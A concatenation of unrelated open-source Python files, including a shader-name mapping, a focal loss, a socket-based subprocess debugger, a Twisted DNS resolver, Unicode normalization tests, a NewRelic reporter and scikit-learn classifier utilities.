"MaterialX/mx_max_float_float", "MaterialX/mx_max_vector" : "MaterialX/mx_max_vector_vector", "MaterialX/mx_max_vector2" : "MaterialX/mx_max_vector2_vector2", "MaterialX/mx_max_vector4" : "MaterialX/mx_max_vector4_vector4", "MaterialX/mx_min_color" : "MaterialX/mx_min_color_color", "MaterialX/mx_min_color2" : "MaterialX/mx_min_color2_color2", "MaterialX/mx_min_color4" : "MaterialX/mx_min_color4_color4", "MaterialX/mx_min_float" : "MaterialX/mx_min_float_float", "MaterialX/mx_min_vector" : "MaterialX/mx_min_vector_vector", "MaterialX/mx_min_vector2" : "MaterialX/mx_min_vector2_vector2", "MaterialX/mx_min_vector4" : "MaterialX/mx_min_vector4_vector4", "MaterialX/mx_modulo_color" : "MaterialX/mx_modulo_color_color", "MaterialX/mx_modulo_color2" : "MaterialX/mx_modulo_color2_color2", "MaterialX/mx_modulo_color4" : "MaterialX/mx_modulo_color4_color4", "MaterialX/mx_modulo_float" : "MaterialX/mx_modulo_float_float", "MaterialX/mx_modulo_vector" : "MaterialX/mx_modulo_vector_vector", "MaterialX/mx_modulo_vector2" : "MaterialX/mx_modulo_vector2_vector2", "MaterialX/mx_modulo_vector4" : "MaterialX/mx_modulo_vector4_vector4", "MaterialX/mx_multiply_color" : "MaterialX/mx_multiply_color_color", "MaterialX/mx_multiply_color2" : "MaterialX/mx_multiply_color2_color2", "MaterialX/mx_multiply_color4" : "MaterialX/mx_multiply_color4_color4", "MaterialX/mx_multiply_float" : "MaterialX/mx_multiply_float_float", "MaterialX/mx_multiply_vector" : "MaterialX/mx_multiply_vector_vector", "MaterialX/mx_multiply_vector2" : "MaterialX/mx_multiply_vector2_vector2", "MaterialX/mx_multiply_vector4" : "MaterialX/mx_multiply_vector4_vector4", "MaterialX/mx_remap_color" : "MaterialX/mx_remap_color_color", "MaterialX/mx_remap_color2" : "MaterialX/mx_remap_color2_color2", "MaterialX/mx_remap_color4" : "MaterialX/mx_remap_color4_color4", "MaterialX/mx_remap_float" : "MaterialX/mx_remap_float_float", "MaterialX/mx_remap_vector" : "MaterialX/mx_remap_vector_vector", "MaterialX/mx_remap_vector2" : "MaterialX/mx_remap_vector2_vector2", "MaterialX/mx_remap_vector4" : "MaterialX/mx_remap_vector4_vector4", "MaterialX/mx_smoothstep_color" : "MaterialX/mx_smoothstep_color_color", "MaterialX/mx_smoothstep_color2" : "MaterialX/mx_smoothstep_color2_color2", "MaterialX/mx_smoothstep_color4" : "MaterialX/mx_smoothstep_color4_color4", "MaterialX/mx_smoothstep_float" : "MaterialX/mx_smoothstep_float_float", "MaterialX/mx_smoothstep_vector" : "MaterialX/mx_smoothstep_vector_vector", "MaterialX/mx_smoothstep_vector2" : "MaterialX/mx_smoothstep_vector2_vector2", "MaterialX/mx_smoothstep_vector4" : "MaterialX/mx_smoothstep_vector4_vector4", "MaterialX/mx_subtract_color" : "MaterialX/mx_subtract_color_color", "MaterialX/mx_subtract_color2" : "MaterialX/mx_subtract_color2_color2", "MaterialX/mx_subtract_color4" : "MaterialX/mx_subtract_color4_color4", "MaterialX/mx_subtract_float" : "MaterialX/mx_subtract_float_float", "MaterialX/mx_subtract_vector" : "MaterialX/mx_subtract_vector_vector", "MaterialX/mx_subtract_vector2" : "MaterialX/mx_subtract_vector2_vector2", "MaterialX/mx_subtract_vector4" : "MaterialX/mx_subtract_vector4_vector4", } def __loadShaderWrapper( originalLoadShader ) : def loadRenamedShader( self, shaderName, **kwargs ) : renamed = __nameMapping.get( shaderName, shaderName ) return originalLoadShader( self, renamed, **kwargs ) return loadRenamedShader GafferOSL.OSLShader.loadShader = __loadShaderWrapper( GafferOSL.OSLShader.loadShader )
maskrcnn_benchmark/layers/focal_loss.py
sergiev/ContourNet
211
12686114
<reponame>sergiev/ContourNet import torch from torch import nn from torch.nn import functional as F def Focal_Loss(pred, gt): # print('yes!!') ce = nn.CrossEntropyLoss() alpha = 0.25 gamma = 2 # logp = ce(input, target) p = torch.sigmoid(pred) loss = -alpha * (1 - p) ** gamma * (gt * torch.log(p)) - \ (1 - alpha) * p ** gamma * ((1 - gt) * torch.log(1 - p)) return loss.mean() # pred =torch.sigmoid(pred) # pos_inds = gt.eq(1).float() # neg_inds = gt.lt(1).float() # # loss = 0 # # pos_loss = torch.log(pred + 1e-10) * torch.pow(pred, 2) * pos_inds # # neg_loss = torch.log(1 - pred) * torch.pow(pred, 2) * neg_weights * neg_inds # neg_loss = torch.log(1 - pred) * torch.pow(1 - pred, 2) * neg_inds # # num_pos = pos_inds.float().sum() # num_neg = neg_inds.float().sum() # # pos_loss = pos_loss.sum() # neg_loss = neg_loss.sum() # # if num_pos == 0: # loss = loss - neg_loss # else: # # loss = loss - (pos_loss + neg_loss) / (num_pos) # loss = loss - (pos_loss + neg_loss ) # return loss * 5 # if weight is not None and weight.sum() > 0: # return (losses * weight).sum() / weight.sum() # else: # assert losses.numel() != 0 # return losses.mean()
run_dir/subprocessdebugger.py
classerase/polygott
370
12686124
<filename>run_dir/subprocessdebugger.py<gh_stars>100-1000 import os import json import select import socket import subprocess import sys import tempfile import remotedebugger if sys.version_info[0] == 2: raise ValueError("Wrong Python version! This script is for Python 3.") class DebuggerSocket(): def __init__(self, socket): self.socket = socket self.buffer = b'' def fileno(self): return self.socket.fileno() def parse_message(self): if b'\n' in self.buffer: data, self.buffer = self.buffer.split(b'\n', 1) msg = json.loads(data.decode('utf8')) return msg def on_read(self): """Reads bytes off the wire and returns all contained messages""" data = self.socket.recv(1024) if not data: raise subprocess.SubprocessError('Subprocess disconnected') self.buffer += data msgs = [] while True: msg = self.parse_message() if msg: msgs.append(msg) else: break return msgs class DebuggerProcess(object): def __init__(self, program): self.temp_dir = tempfile.TemporaryDirectory() self.filename = os.path.join(self.temp_dir.name, 'usermodule.py') with open(self.filename, 'w') as f: f.write(program) host, port = ('127.0.0.1', 1234) listen_socket = socket.socket() listen_socket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, True) listen_socket.bind((host, port)) listen_socket.listen(1) self.p = subprocess.Popen([ sys.executable, os.path.abspath(remotedebugger.__file__), '--host', host, '--port', str(port), '--connect', '--file', self.filename, ], stdin=subprocess.PIPE, # use real stdout/stderr for printing errors ) self.messages = [] self.done = False self.s, _ = listen_socket.accept() listen_socket.close() self.debuggerSocket = DebuggerSocket(self.s) self.has_already_stepped_once = False def send(self, kind): msg = json.dumps({'kind': kind}).encode('utf8')+b'\n' self.s.sendall(msg) def step(self): """Yields messages until current stack is returned. Yielded messages will be of one of these types * {kind: 'stdout', data: 'data'} when the process writes to stdout * (kind: 'stderr', data: 'data') when the process writes to stderr * (kind: 'error', data: 'Traceback ...'} The first step does not step, it just returns the first stack. """ if self.done: return 'done' elif self.has_already_stepped_once: self.send('step') else: self.has_already_stepped_once = True yield from self.update_stack() return 'done' if self.done else self.stack def update_stack(self): stack_or_done = yield from self._get_stack() if stack_or_done == 'done': self.done = True self.stack = [] else: self.stack = stack_or_done def _get_stack(self): """Returns a list of stack frame {lineno, functionName}, or 'done'""" for kind, payload in self.get_subproc_msgs('stack'): if kind == 'stack': stack = payload elif kind == 'stdout': yield (kind, payload) elif kind == 'stderr': yield (kind, payload) elif kind == 'done': return 'done' elif kind == 'error': yield ('error', payload) return 'done' else: raise ValueError("Unexpected message: "+repr((kind, payload))) return stack def get_subproc_msgs(self, kind='stack'): """Yields subprocess messages until the requested message is received. This method also forwards stdin bytes to the debugger subprocess, so it's important to use it instead of a (blocking) self.s.recv() """ readers = [self.debuggerSocket, sys.stdin] while True: rs, _, _ = select.select(readers, [], []) for reader in rs: if reader is sys.stdin: self.p.stdin.write(bytearray(reader.readline(), 'utf-8')) elif reader is self.debuggerSocket: msgs = self.debuggerSocket.on_read() for msg in msgs: yield (msg['kind'], msg['data']) if msg['kind'] == kind: return def cleanup(self): self.s.close() self.p.stdin.close() self.p.kill() self.temp_dir.cleanup() def __enter__(self): return self def __exit__(self, *args): self.cleanup() def __del__(self): self.cleanup()
lib/carbon/resolver.py
hessu/carbon
961
12686148
<gh_stars>100-1000 import random from zope.interface import implementer from twisted.internet._resolver import GAIResolver from twisted.internet.defer import Deferred from twisted.internet.address import IPv4Address from twisted.internet.interfaces import IResolverSimple, IResolutionReceiver from twisted.internet.error import DNSLookupError # Inspired from /twisted/internet/_resolver.py @implementer(IResolutionReceiver) class RandomWins(object): """ An L{IResolutionReceiver} which fires a L{Deferred} with a random result. """ def __init__(self, deferred): """ @param deferred: The L{Deferred} to fire with one resolution result arrives. """ self._deferred = deferred self._results = [] def resolutionBegan(self, resolution): """ See L{IResolutionReceiver.resolutionBegan} @param resolution: See L{IResolutionReceiver.resolutionBegan} """ self._resolution = resolution def addressResolved(self, address): """ See L{IResolutionReceiver.addressResolved} @param address: See L{IResolutionReceiver.addressResolved} """ self._results.append(address.host) def resolutionComplete(self): """ See L{IResolutionReceiver.resolutionComplete} """ if self._results: random.shuffle(self._results) self._deferred.callback(self._results[0]) else: self._deferred.errback(DNSLookupError(self._resolution.name)) @implementer(IResolverSimple) class ComplexResolverSimplifier(object): """ A converter from L{IHostnameResolver} to L{IResolverSimple} """ def __init__(self, nameResolver): """ Create a L{ComplexResolverSimplifier} with an L{IHostnameResolver}. @param nameResolver: The L{IHostnameResolver} to use. """ self._nameResolver = nameResolver def getHostByName(self, name, timeouts=()): """ See L{IResolverSimple.getHostByName} @param name: see L{IResolverSimple.getHostByName} @param timeouts: see L{IResolverSimple.getHostByName} @return: see L{IResolverSimple.getHostByName} """ result = Deferred() self._nameResolver.resolveHostName(RandomWins(result), name, 0, [IPv4Address]) return result def setUpRandomResolver(reactor): resolver = GAIResolver(reactor, reactor.getThreadPool) reactor.installResolver(ComplexResolverSimplifier(resolver))
pypy/module/unicodedata/test/test_hyp.py
nanjekyejoannah/pypy
333
12686226
<filename>pypy/module/unicodedata/test/test_hyp.py import sys import pytest try: from hypothesis import given, strategies as st, example, settings, assume except ImportError: pytest.skip("hypothesis required") from pypy.module.unicodedata.interp_ucd import ucd from rpython.rlib.rutf8 import codepoints_in_utf8 def make_normalization(space, NF_code): def normalize(s): u = s.encode('utf8') w_s = space.newutf8(u, codepoints_in_utf8(u)) w_res = ucd.normalize(space, NF_code, w_s) return space.utf8_w(w_res).decode('utf8') return normalize all_forms = ['NFC', 'NFD', 'NFKC', 'NFKD'] # For every (n1, n2, n3) triple, applying n1 then n2 must be the same # as applying n3. # Reference: http://unicode.org/reports/tr15/#Design_Goals compositions = [ ('NFC', 'NFC', 'NFC'), ('NFC', 'NFD', 'NFD'), ('NFC', 'NFKC', 'NFKC'), ('NFC', 'NFKD', 'NFKD'), ('NFD', 'NFC', 'NFC'), ('NFD', 'NFD', 'NFD'), ('NFD', 'NFKC', 'NFKC'), ('NFD', 'NFKD', 'NFKD'), ('NFKC', 'NFC', 'NFKC'), ('NFKC', 'NFD', 'NFKD'), ('NFKC', 'NFKC', 'NFKC'), ('NFKC', 'NFKD', 'NFKD'), ('NFKD', 'NFC', 'NFKC'), ('NFKD', 'NFD', 'NFKD'), ('NFKD', 'NFKC', 'NFKC'), ('NFKD', 'NFKD', 'NFKD'), ] @pytest.mark.parametrize('NF1, NF2, NF3', compositions) @example(s=u'---\uafb8\u11a7---') # issue 2289 @settings(max_examples=1000) @given(s=st.text()) def test_composition(s, space, NF1, NF2, NF3): # 'chr(0xfacf) normalizes to chr(0x2284a), which is too big') assume(not (s == u'\ufacf' and sys.maxunicode == 65535)) norm1, norm2, norm3 = [make_normalization(space, form) for form in [NF1, NF2, NF3]] assert norm2(norm1(s)) == norm3(s) if sys.maxunicode != 65535: # conditionally generate the example via an unwrapped decorator test_composition = example(s=u'\ufacf')(test_composition)
src/models/sequence/rnns/__init__.py
dumpmemory/state-spaces
513
12686249
# Expose the cell registry and load all possible cells from .cells.basic import CellBase from .cells import basic from .cells import hippo from .cells import timestamp from . import sru
test/sanity/issue4493-win-open-size/test.py
frank-dspeed/nw.js
27,296
12686263
<gh_stars>1000+ import time import os import platform from selenium import webdriver from selenium.webdriver.chrome.options import Options chrome_options = Options() chrome_options.add_argument("nwapp=" + os.path.dirname(os.path.abspath(__file__))) # open first time print 'Open first time' driver = webdriver.Chrome(executable_path=os.environ['CHROMEDRIVER'], chrome_options=chrome_options) driver.implicitly_wait(10) try: print driver.current_url size = driver.find_element_by_id('size').get_attribute('innerHTML') print 'open size %s' % size driver.find_element_by_id('resize-window').click() size = driver.find_element_by_id('resize').get_attribute('innerHTML') print 'resize to %s' % size finally: driver.quit() # open second time print 'Open second time' driver = webdriver.Chrome(executable_path=os.environ['CHROMEDRIVER'], chrome_options=chrome_options) driver.implicitly_wait(10) try: print driver.current_url size = driver.find_element_by_id('size').get_attribute('innerHTML') print 'open size %s' % size assert(size == '666x333' or size == '667x334') finally: driver.quit()
pyformance/reporters/newrelic_reporter.py
boarik/pyformance
167
12686279
# -*- coding: utf-8 -*- from __future__ import print_function import json import os import socket import sys from pyformance.registry import set_global_registry, MetricsRegistry if sys.version_info[0] > 2: import urllib.request as urllib import urllib.error as urlerror else: import urllib2 as urllib import urllib2 as urlerror from pyformance.__version__ import __version__ from .reporter import Reporter DEFAULT_CARBON_SERVER = "0.0.0.0" DEFAULT_CARBON_PORT = 2003 class NewRelicSink(object): def __init__(self): self.total = 0 self.count = 0 self.min = None self.max = None self.sum_of_squares = 0 def add(self, seconds): self.total += seconds self.count += 1 self.sum_of_squares += seconds * seconds self.min = min(self.min, seconds) if self.min else seconds self.max = max(self.max, seconds) if self.max else seconds pass class NewRelicRegistry(MetricsRegistry): def create_sink(self): return NewRelicSink() set_global_registry(NewRelicRegistry()) class NewRelicReporter(Reporter): """ Reporter for new relic """ MAX_METRICS_PER_REQUEST = 10000 PLATFORM_URL = "https://platform-api.newrelic.com/platform/v1/metrics" def __init__( self, license_key, registry=None, name=socket.gethostname(), reporting_interval=5, prefix="", clock=None, ): super(NewRelicReporter, self).__init__(registry, reporting_interval, clock) self.name = name self.prefix = prefix self.http_headers = { "Accept": "application/json", "Content-Type": "application/json", "X-License-Key": license_key, } def report_now(self, registry=None, timestamp=None): metrics = self.collect_metrics(registry or self.registry) if metrics: try: # XXX: better use http-keepalive/pipelining somehow? request = urllib.Request( self.PLATFORM_URL, metrics.encode() if sys.version_info[0] > 2 else metrics, ) for k, v in self.http_headers.items(): request.add_header(k, v) result = urllib.urlopen(request) if isinstance(result, urlerror.HTTPError): raise result except Exception as e: print(e, file=sys.stderr) @property def agent_data(self): """Return the agent data section of the NewRelic Platform data payload :rtype: dict """ return { "host": socket.gethostname(), "pid": os.getpid(), "version": __version__, } def create_metrics(self, registry): results = {} # noinspection PyProtectedMember timers = registry._timers for key in timers: sink = timers[key].sink if not sink.count: continue full_key = "Component/%s%s" % (self.prefix, key) results[full_key.replace(".", "/")] = { "total": sink.total, "count": sink.count, "min": sink.min, "max": sink.max, "sum_of_squares": sink.sum_of_squares, } sink.__init__() return results def collect_metrics(self, registry): body = { "agent": self.agent_data, "components": [ { "guid": "com.github.pyformance", "name": self.name, "duration": self.reporting_interval, "metrics": self.create_metrics(registry), } ], } return json.dumps(body, ensure_ascii=False, sort_keys=True)
osquery/plugin.py
eoinmiller-r7/osquery-python
274
12686282
<gh_stars>100-1000 """This source code is licensed under the BSD-style license found in the LICENSE file in the root directory of this source tree. An additional grant of patent rights can be found in the PATENTS file in the same directory. """ # pylint: disable=no-self-use from __future__ import absolute_import from __future__ import division from __future__ import print_function from __future__ import unicode_literals from abc import ABCMeta, abstractmethod from future.utils import with_metaclass from osquery.singleton import Singleton class BasePlugin(with_metaclass(ABCMeta, Singleton)): """All osquery plugins should inherit from BasePlugin""" @abstractmethod def call(self, context): """Call is the method that is responsible for routing a thrift request to the appropriate class method. This must be implemented by the plugin type (ie: LoggerPlugin), but explicitly not an end-user plugin type (ie: MyAwesomeLoggerPlugin) call should return an ExtensionResponse, as defined in osquery.thrift """ raise NotImplementedError @abstractmethod def name(self): """The name of your plugin. This must be implemented by your plugin. """ raise NotImplementedError def routes(self): """The routes that should be broadcasted by your plugin""" return []
constrained_language_typology/scikit_classifier.py
deepneuralmachine/google-research
23,901
12686290
# coding=utf-8 # Copyright 2021 The Google Research Authors. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. """Simple sckit-learn classification utilities.""" from __future__ import absolute_import from __future__ import division from __future__ import print_function from __future__ import unicode_literals import math import pickle from absl import flags from absl import logging import numpy as np from sklearn import model_selection from sklearn.compose import make_column_transformer from sklearn.discriminant_analysis import LinearDiscriminantAnalysis from sklearn.discriminant_analysis import QuadraticDiscriminantAnalysis from sklearn.ensemble import AdaBoostClassifier from sklearn.ensemble import BaggingClassifier from sklearn.ensemble import RandomForestClassifier from sklearn.gaussian_process import GaussianProcessClassifier from sklearn.linear_model import LogisticRegression from sklearn.linear_model import RidgeClassifier from sklearn.model_selection import RepeatedStratifiedKFold from sklearn.naive_bayes import GaussianNB from sklearn.neural_network import MLPClassifier from sklearn.preprocessing import OneHotEncoder from sklearn.preprocessing import StandardScaler from sklearn.svm import LinearSVC from sklearn.tree import DecisionTreeClassifier # pylint: disable=invalid-name flags.DEFINE_boolean( "transform_inputs", True, "If enabled, will scale the numeric features and convert categorical " "features to one-hot encoding.") flags.DEFINE_list( "classifiers", ["LogisticRegression"], "Type of the classifier. One of: \"LogisticRegression\", \"SVM\", " "\"RidgeRegression\", \"RandomForest\", \"AdaBoost\", \"LDA\", \"QDA\", " "\"GaussianProcess\", \"DecisionTree\", \"DNN\", \"GaussianNaiveBayes\", " "\"BaggingEnsemble\".") flags.DEFINE_boolean( "use_implicationals", True, "If True, use the implicational features.") flags.DEFINE_string( "best_configurations_file", "", "File containing the JSON dictionary from feature names to the " "respective best model and data configurations. When `--cross_validate` " "is enabled, this is the output file to be generated. In all other modes " "this is an input file.") FLAGS = flags.FLAGS # List of all supported classifiers. ALL_MODELS = [ "AdaBoost", "DNN", "DecisionTree", "GaussianProcess", "LDA", "LogisticRegression", "QDA", "RandomForest", "RidgeRegression", "SVM", "GaussianNaiveBayes", "BaggingEnsemble" ] # Model information keys. MODEL_INFO_NAME_KEY = "name" MODEL_INFO_SPARSITY_KEY = "no_cv" # Not enough data. MODEL_INFO_SCORE_KEY = "accuracy" MODEL_INFO_CANDIDATES_KEY = "candidates" # Random seed. _RANDOM_STATE = 4611170 # WALS language code. _LANGUAGE_CODE = "wals_code" def _prepare_data(input_df): """Splits data into features and labels.""" class_label = "target_value" y = input_df[class_label].copy() X_columns_to_drop = [class_label, _LANGUAGE_CODE, "target_feature"] X = input_df.drop(columns=X_columns_to_drop) return X, y def _split_into_features_and_labels(feature_name, feature_maker, training_df, dev_df, transform_inputs): """Preprocesses the data and returns the features and labels.""" # Get the label class counts for the training data. train_class_counts = training_df.target_value.value_counts() train_class_counts = list(zip(train_class_counts.index, train_class_counts.values)) logging.info("%s: Class counts: %s", feature_name, train_class_counts) # Perform the split into features and labels of the training set. X_train, y_train = _prepare_data(training_df) logging.info("%s: Input feature dimensions: %s", feature_name, X_train.shape[1]) # Split dev set. X_dev, y_dev = _prepare_data(dev_df) # Numeric columns are transformed using standard scaler and categorical # columns are converted to one-hot. if transform_inputs: numeric_cols = ["latitude", "longitude"] categorical_cols = [] for col_name in X_train.columns: if (col_name in feature_maker.prob_features or col_name in feature_maker.count_features): numeric_cols.append(col_name) # Counts, probabilities. elif col_name in feature_maker.categorical_features: categorical_cols.append(col_name) # Categorical feature values. inputs_transformer = make_column_transformer( (StandardScaler(), numeric_cols), (OneHotEncoder(handle_unknown="ignore"), categorical_cols), remainder="passthrough") X_train = inputs_transformer.fit_transform(X_train) if X_dev.shape[0]: # Do we have enough samples? X_dev = inputs_transformer.transform(X_dev) else: logging.warning("Feature %s not found in the dev set. This is likely to " "crash the evaluation mode!", feature_name) else: # Transform data frames to Numpy. The input transformer in the branch above # returns Numpy arrays. X_train = X_train.to_numpy() X_dev = X_dev.to_numpy() return ( X_train, y_train.to_numpy(), X_dev, y_dev.to_numpy(), train_class_counts) def prepare_data(feature_maker, feature_name, use_implicationals=True, prediction_mode=False): """Prepares the features and labels for the given WALS feature name.""" # Process training and dev data for the feature. Store the WALS language codes # for the development set aside. training_df, dev_df = feature_maker.process_data( feature_name, prediction_mode=prediction_mode) assert _LANGUAGE_CODE in dev_df.columns dev_language_codes = list(dev_df[_LANGUAGE_CODE].values) if not use_implicationals: logging.info("Discarding implicational features") training_df = feature_maker.select_columns(training_df, discard_implicationals=True) dev_df = feature_maker.select_columns(dev_df, discard_implicationals=True) # Split the data into features and labels. X_train, y_train, X_dev, y_dev, train_class_counts = ( _split_into_features_and_labels( feature_name, feature_maker, training_df, dev_df, FLAGS.transform_inputs)) return X_train, y_train, X_dev, y_dev, dev_language_codes, train_class_counts def _make_classifier(classifier_name): """Classifier factory.""" # Class weights: if you set this to None, you'd get much better accuracies, # but it's likely that the classifier will be overpredicting the majority # class. class_weight_strategy = None # Note: this may set "balanced" as default. max_iters = 10000 if classifier_name == "AdaBoost": model = AdaBoostClassifier(n_estimators=100) elif classifier_name == "LogisticRegression": model = LogisticRegression(max_iter=max_iters, class_weight=class_weight_strategy) elif classifier_name == "LDA": model = LinearDiscriminantAnalysis(tol=1E-6) elif classifier_name == "QDA": model = QuadraticDiscriminantAnalysis() elif classifier_name == "DNN": model = MLPClassifier(random_state=_RANDOM_STATE, hidden_layer_sizes=[200]) elif classifier_name == "DecisionTree": model = DecisionTreeClassifier(random_state=_RANDOM_STATE, min_samples_leaf=3, criterion="entropy", class_weight="balanced") elif classifier_name == "GaussianProcess": model = GaussianProcessClassifier(random_state=_RANDOM_STATE, max_iter_predict=200) elif classifier_name == "RandomForest": model = RandomForestClassifier(n_estimators=200, random_state=_RANDOM_STATE, min_samples_leaf=3, criterion="entropy", class_weight="balanced_subsample") elif classifier_name == "RidgeRegression": model = RidgeClassifier(normalize=True, tol=1E-5, class_weight=class_weight_strategy) elif classifier_name == "SVM": model = LinearSVC(max_iter=max_iters, class_weight=class_weight_strategy) elif classifier_name == "GaussianNaiveBayes": model = GaussianNB() elif classifier_name == "BaggingEnsemble": model = BaggingClassifier(random_state=_RANDOM_STATE) else: raise ValueError("Unsupported classifier: %s" % classifier_name) return model def cross_validate(feature_name, classifier_name, X, y, cv_num_folds, cv_num_repeats): """Runs repeated stratified $k$-fold cross-validation. Returns multiple cross-validation metrics as a dictionary, where for each metric mean and variance across multiple repeats and folds is summarized. Args: feature_name: (string) Name of the WALS feature. classifier_name: (string) Classifier name. X: (numpy array) Input features. y: (numpy array) Labels. cv_num_folds: (int) Number of folds ($k$). cv_num_repeats: (int) Number of repetitions. Returns: Dictionary containing cross-validation scores and stats. """ model = _make_classifier(classifier_name) scoring = ["f1_micro", "precision_micro", "recall_micro", "accuracy"] try: # Really primitive logic to figure out class distribution. _, y_counts = np.unique(y, return_counts=True) y_max_freq = np.max(y_counts) # Check if the class counts are not reliable to run cross-validation. if y_max_freq < cv_num_folds: logging.warning("[%s] %s: Not enough data. Fitting the model instead " "of running CV", feature_name, classifier_name) # Simply fit the model. model.fit(X, y) cv_scores = {} cv_scores["accuracy"] = (model.score(X, y), 0.0) cv_scores[MODEL_INFO_SPARSITY_KEY] = True return cv_scores else: logging.info("[%s] Running cross-validation of %s (k=%d, n=%d) ...", feature_name, classifier_name, cv_num_folds, cv_num_repeats) # Run cross-validation. cv = RepeatedStratifiedKFold(n_splits=cv_num_folds, n_repeats=cv_num_repeats, random_state=_RANDOM_STATE) cv_scores = model_selection.cross_validate( model, X, y, cv=cv, scoring=scoring, n_jobs=cv_num_folds) cv_scores[MODEL_INFO_SPARSITY_KEY] = False except Exception as e: # pylint: disable=broad-except logging.error("[%s] %s: CV: Exception: %s", feature_name, classifier_name, e) return None del cv_scores["fit_time"] del cv_scores["score_time"] for score_name in scoring: scores_vec_key = "test_" + score_name cv_scores[score_name] = (np.mean(cv_scores[scores_vec_key]), np.var(cv_scores[scores_vec_key])) del cv_scores[scores_vec_key] # Sanity check. if math.isnan(cv_scores["accuracy"][0]): return None logging.info("[train] %s: CV scores for %s: %s", feature_name, classifier_name, cv_scores) return cv_scores def train_classifier(feature_name, classifier_name, X, y, model_path=None): """Trains classifier.""" model = _make_classifier(classifier_name) logging.info("%s: Fitting %s model ...", feature_name, classifier_name) model.fit(X, y) logging.info("%s: %s: Score: %s", feature_name, classifier_name, model.score(X, y)) if model_path: logging.info("Saving model to \"%s\" ...", model_path) pickle.dump(model, open(model_path, "wb")) return model def select_best_model(classifiers, feature_name, X_train, y_train, cv_num_folds, cv_num_repeats): """Performs cross-validation of various classifiers for a given feature. Returns a dictionary with the best classifier name, its score and the number of candidates it was selected from. Args: classifiers: (list) Names of the classifiers to choose from. feature_name: (string) WALS feature name. X_train: (numpy array) Training features. y_train: (numpy array) Training labels. cv_num_folds: (int) Number of folds ($k$). cv_num_repeats: (int) Number of repetitions. Returns: Dictionary containing best configuration. """ scores = [] for classifier_name in classifiers: clf_scores = cross_validate(feature_name, classifier_name, X_train, y_train, cv_num_folds, cv_num_repeats) if clf_scores: # Cross-validation may fail for some settings. scores.append((classifier_name, clf_scores)) # Sort the scores by the highest accuracy mean. For some reason F1 and # accuracy are the same (as is the precision and recall). Investigate. scores = sorted(scores, key=lambda score: score[1]["accuracy"][0], reverse=True) if len(scores) < 5: raise ValueError("Expected at least five candidate classifiers!") best_model = scores[0] return { MODEL_INFO_NAME_KEY: best_model[0], # Model name. # Accuracy mean. MODEL_INFO_SCORE_KEY: best_model[1]["accuracy"][0], # Boolean sparsity marker. MODEL_INFO_SPARSITY_KEY: best_model[1][MODEL_INFO_SPARSITY_KEY], # Overall number of successful evals. MODEL_INFO_CANDIDATES_KEY: len(scores) }
modules/core/sublime_event_loop.py
timfjord/sublime_debugger
225
12686291
<filename>modules/core/sublime_event_loop.py<gh_stars>100-1000 from __future__ import annotations import asyncio import sublime import threading class Handle: def __init__(self, callback, args): self.callback = callback self.args = args def __call__(self): if self.callback: self.callback(*self.args) def cancel(self): self.callback = None self.args = None class SublimeEventLoop (asyncio.AbstractEventLoop): def run_forever(self): raise NotImplementedError def run_until_complete(self, future): raise NotImplementedError def stop(self): raise NotImplementedError def is_running(self): raise NotImplementedError def is_closed(self): raise NotImplementedError def close(self): raise NotImplementedError def shutdown_asyncgens(self): raise NotImplementedError # Methods scheduling callbacks. All these return Handles. def _timer_handle_cancelled(self, handle): raise NotImplementedError def call_soon(self, callback, *args, context=None): handle = Handle(callback, args) sublime.set_timeout(handle, 0) return handle def call_later(self, delay, callback, *args, context=None): handle = Handle(callback, args) sublime.set_timeout(handle, delay * 1000) return handle def call_at(self, when, callback, *args): raise NotImplementedError def time(self): raise NotImplementedError def create_future(self): return asyncio.futures.Future(loop=self) # Method scheduling a coroutine object: create a task. def create_task(self, coro): task = asyncio.tasks.Task(coro, loop=self) if task._source_traceback: #type: ignore del task._source_traceback[-1] #type: ignore return task # Methods for interacting with threads. def call_soon_threadsafe(self, callback, *args): return self.call_later(0, callback, *args) def run_in_executor(self, executor, func, *args): raise NotImplementedError def set_default_executor(self, executor): raise NotImplementedError # Task factory. def set_task_factory(self, factory): raise NotImplementedError def get_task_factory(self): raise NotImplementedError # Error handlers. def get_exception_handler(self): raise NotImplementedError def set_exception_handler(self, handler): raise NotImplementedError def default_exception_handler(self, context): raise NotImplementedError def call_exception_handler(self, context): from .log import log_exception from .error import Error try: if 'exception' in context: raise context['exception'] else: raise Error(context['message']) except Exception as e: log_exception() # Debug flag management. def get_debug(self): return False def set_debug(self, enabled): raise NotImplementedError
qiskit_nature/transformers/base_transformer.py
renier/qiskit-nature
132
12686308
<gh_stars>100-1000 # This code is part of Qiskit. # # (C) Copyright IBM 2021. # # This code is licensed under the Apache License, Version 2.0. You may # obtain a copy of this license in the LICENSE.txt file in the root directory # of this source tree or at http://www.apache.org/licenses/LICENSE-2.0. # # Any modifications or derivative works of this code must retain this # copyright notice, and modified files need to carry a notice indicating # that they have been altered from the originals. """The Base Operator Transformer interface.""" from abc import ABC, abstractmethod from typing import Any class BaseTransformer(ABC): """**DEPRECATED!** The interface for implementing methods which map from one `QMolecule` or 'WatsonHamiltonian' to another. These methods may or may not affect the size of the Hilbert space. """ @abstractmethod def transform(self, molecule_data: Any): """Transforms one `QMolecule` or 'WatsonHamiltonian' into another one. This may or may not affect the size of the Hilbert space. Args: molecule_data: the `QMolecule` or 'WatsonHamiltonian' to be transformed. Returns: A new `QMolecule` or 'WatsonHamiltonian' instance. """ raise NotImplementedError()
src/twisted/internet/iocpreactor/iocpsupport.py
giadram/twisted
4,612
12686316
<filename>src/twisted/internet/iocpreactor/iocpsupport.py __all__ = [ "CompletionPort", "Event", "accept", "connect", "get_accept_addrs", "have_connectex", "makesockaddr", "maxAddrLen", "recv", "recvfrom", "send", ] from twisted_iocpsupport.iocpsupport import ( # type: ignore[import] CompletionPort, Event, accept, connect, get_accept_addrs, have_connectex, makesockaddr, maxAddrLen, recv, recvfrom, send, )
tests/neptune/new/internal/test_container_structure.py
Raalsky/neptune-client
254
12686319
